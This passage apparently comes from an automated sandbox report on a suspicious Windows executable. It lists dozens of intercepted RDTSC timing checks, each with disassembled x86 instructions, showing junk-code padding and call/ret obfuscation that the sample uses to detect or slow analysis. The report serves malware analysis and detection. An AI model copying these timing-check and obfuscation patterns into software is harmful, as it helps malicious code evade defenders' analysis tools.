0x00000063 pushad 0x00000064 mov dword ptr [ebp+122D22BEh], eax 0x0000006a movzx edi, cx 0x0000006d popad 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 clc 0x00000073 nop 0x00000074 pushad 0x00000075 jmp 00007F2A913FCEA3h 0x0000007a push eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A18DD1 second address: A18DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A18DD5 second address: A18DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A18DD9 second address: A18DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A18DE7 second address: A18DED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B967BF second address: B967C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B96A8E second address: B96AA6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2A913FCE9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F2A913FCE96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B96BED second address: B96BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B96BF1 second address: B96BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B96BFD second address: B96C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2A9129471Ch 0x0000000a pushad 0x0000000b jmp 00007F2A91294727h 0x00000010 jl 00007F2A91294716h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B96D66 second address: B96D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B96F4A second address: B96F58 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2A91294716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B9ACAC second address: B9AD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F2A913FCE9Fh 0x0000000a popad 0x0000000b add dword ptr [esp], 439FE4EEh 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F2A913FCE98h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1D9Ch], esi 0x00000034 push 00000000h 0x00000036 jmp 00007F2A913FCEA0h 0x0000003b jmp 00007F2A913FCE9Ah 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 push edi 0x00000045 call 00007F2A913FCE98h 0x0000004a pop edi 0x0000004b mov dword ptr [esp+04h], edi 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc edi 0x00000058 push edi 0x00000059 ret 0x0000005a pop edi 0x0000005b ret 0x0000005c push F2E82358h 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B9AD3F second address: B9AD49 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2A91294716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B9AD49 second address: B9AD80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 32E82358h 0x00000010 mov dword ptr [ebp+122D3978h], edx 0x00000016 lea ebx, dword ptr [ebp+12455B7Fh] 0x0000001c add dword ptr [ebp+122D1C6Ah], ebx 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jbe 00007F2A913FCE9Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B9AD80 second address: B9AD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBBC52 second address: BBBC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jno 00007F2A913FCE96h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBBC66 second address: BBBC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA0A6 second address: BBA0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA0AC second address: BBA0E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294724h 0x00000007 jl 00007F2A91294716h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F2A91294729h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA521 second address: BBA550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2A913FCE96h 0x0000000a jmp 00007F2A913FCEA4h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F2A913FCE9Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA550 second address: BBA568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A91294724h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA568 second address: BBA590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F2A913FCEA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA80F second address: BBA81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2A91294716h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA9CA second address: BBA9E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA1h 0x00000007 jnc 00007F2A913FCE96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA9E5 second address: BBA9ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA9ED second address: BBAA05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2A913FCE9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBAB78 second address: BBAB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A9129471Ah 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBAB8B second address: BBAB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBAB91 second address: BBAB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBAB95 second address: BBABBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2A913FCE9Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2A913FCE9Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBABBC second address: BBABC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBABC0 second address: BBABC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBABC6 second address: BBABCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBABCD second address: BBABD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BAE4D2 second address: BAE4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BAE4DA second address: BAE4F4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2A913FCE96h 0x00000008 jmp 00007F2A913FCE9Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B90781 second address: B9078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F2A91294716h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B9078D second address: B90791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBB7A1 second address: BBB7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A9129471Fh 0x00000009 popad 0x0000000a jmp 00007F2A9129471Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F2A91294716h 0x00000017 jne 00007F2A91294716h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBB7D0 second address: BBB7ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBB7ED second address: BBB80C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F2A91294722h 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBDFC9 second address: BBDFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBE762 second address: BBE76B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBFA41 second address: BBFA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC6192 second address: BC6196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC6196 second address: BC61B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F2A913FCEA2h 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC61B9 second address: BC61C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F2A9129471Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC5D53 second address: BC5D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC7DF6 second address: BC7DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC8081 second address: BC808C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F2A913FCE96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC8169 second address: BC817B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2A91294716h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC817B second address: BC817F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC8941 second address: BC89B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007F2A91294722h 0x0000000e xchg eax, ebx 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F2A91294718h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, 18B897F4h 0x0000002e nop 0x0000002f push edx 0x00000030 push ecx 0x00000031 jnc 00007F2A91294716h 0x00000037 pop ecx 0x00000038 pop edx 0x00000039 push eax 0x0000003a pushad 0x0000003b jmp 00007F2A91294722h 0x00000040 pushad 0x00000041 jmp 00007F2A9129471Dh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC8EA5 second address: BC8EAF instructions: 0x00000000 rdtsc 0x00000002 je 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC8EAF second address: BC8EDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F2A91294716h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 ja 00007F2A91294716h 0x00000018 jmp 00007F2A91294726h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC8EDE second address: BC8F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F2A913FCE98h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D228Eh] 0x0000002a push eax 0x0000002b push ecx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC9397 second address: BC939B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC939B second address: BC93F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F2A913FCE98h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 jmp 00007F2A913FCEA9h 0x0000002d xchg eax, ebx 0x0000002e jbe 00007F2A913FCE9Eh 0x00000034 push edx 0x00000035 jl 00007F2A913FCE96h 0x0000003b pop edx 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 pop eax 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC93F5 second address: BC93FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC93FB second address: BC9401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC9401 second address: BC9405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC9BBA second address: BC9BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B7FF9F second address: B7FFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F2A91294716h 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007F2A9129471Ah 0x00000016 jmp 00007F2A9129471Eh 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCC264 second address: BCC268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCCD18 second address: BCCD28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A9129471Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCCD28 second address: BCCD86 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F2A913FCE98h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 stc 0x0000002a push 00000000h 0x0000002c call 00007F2A913FCEA2h 0x00000031 jno 00007F2A913FCE9Ch 0x00000037 pop edi 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D2D73h], edi 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCCD86 second address: BCCD94 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2A91294716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCECAE second address: BCED01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A913FCEA1h 0x00000008 jng 00007F2A913FCE96h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 mov esi, 7942FB73h 0x00000019 push 00000000h 0x0000001b jc 00007F2A913FCE96h 0x00000021 mov dword ptr [ebp+122D3854h], ebx 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a mov esi, ecx 0x0000002c pop edi 0x0000002d xchg eax, ebx 0x0000002e push edx 0x0000002f jmp 00007F2A913FCE9Ch 0x00000034 pop edx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 je 00007F2A913FCE96h 0x0000003f pop eax 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD1B2F second address: BD1B35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD1B35 second address: BD1B9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F2A913FCE9Fh 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 pop esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F2A913FCE98h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e jmp 00007F2A913FCE9Bh 0x00000033 push edx 0x00000034 mov esi, edx 0x00000036 pop edi 0x00000037 xchg eax, ebx 0x00000038 jne 00007F2A913FCE9Eh 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 js 00007F2A913FCE96h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCF5B8 second address: BCF5BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD1B9C second address: BD1BA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCF5BD second address: BCF5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jnc 00007F2A91294716h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCF5CF second address: BCF5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCF5D8 second address: BCF5DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD2412 second address: BD2420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
